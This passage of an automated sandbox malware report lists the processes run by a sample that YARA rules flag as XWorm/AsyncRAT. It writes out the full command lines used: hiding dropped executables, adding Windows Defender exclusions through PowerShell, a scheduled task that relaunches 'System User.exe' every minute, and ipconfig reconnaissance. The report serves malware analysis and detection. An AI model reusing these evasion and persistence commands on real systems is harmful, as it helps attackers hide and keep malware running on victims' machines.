                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                    Imagebase:0x7ff7a4f70000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe"
                                                                                                                                                                                                    Imagebase:0x7ff7a4f70000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                    Imagebase:0x7ff7a4f70000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe"
                                                                                                                                                                                                    Imagebase:0x7ff7a4f70000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    Imagebase:0x7ff7645b0000
                                                                                                                                                                                                    File size:23'040 bytes
                                                                                                                                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    Imagebase:0x3d0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: ditekSHen
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 82%, ReversingLabs
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    Imagebase:0x7ff7645b0000
                                                                                                                                                                                                    File size:23'040 bytes
                                                                                                                                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    Imagebase:0x26232200000
                                                                                                                                                                                                    File size:819'200 bytes
                                                                                                                                                                                                    MD5 hash:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 63%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"cmd" /c ipconfig /all
                                                                                                                                                                                                    Imagebase:0x7ff7a4f70000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:ipconfig /all
                                                                                                                                                                                                    Imagebase:0x7ff649180000
                                                                                                                                                                                                    File size:35'840 bytes
                                                                                                                                                                                                    MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                    Start time:13:03:19
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                    Start time:13:03:19
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                    Start time:13:03:28
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224
                                                                                                                                                                                                    Imagebase:0x7ff6938d0000
                                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                    Start time:13:03:29
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                    Start time:13:03:29
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                    Start time:13:03:43
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                    Start time:13:03:43
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                    Start time:13:04:01
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                    Start time:13:04:01
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                    Start time:13:04:28
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0x7ff7c6980000
                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                    Start time:13:04:28
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                    Start time:13:04:29
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: ditekSHen
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 82%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                    Start time:13:04:38
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0xaf0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                    Start time:13:04:46
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0xdb0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                    Start time:13:05:01
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0xba0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:8.5%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:14.9%
                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                      Total number of Limit Nodes:31
